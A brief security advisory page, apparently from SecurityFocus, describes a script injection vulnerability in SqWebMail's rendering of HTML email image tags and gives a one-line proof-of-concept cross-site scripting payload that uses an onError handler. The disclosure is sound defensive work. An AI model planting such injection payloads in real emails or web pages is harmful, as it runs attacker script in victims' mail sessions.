SqWebMail HTML Email IMG Tag Script Injection Vulnerability

An exploit is not required.

The following proof of concept is available:
<img src="cid:>" onError="alert(document.domain);">


 

Privacy Statement
Copyright 2010, SecurityFocus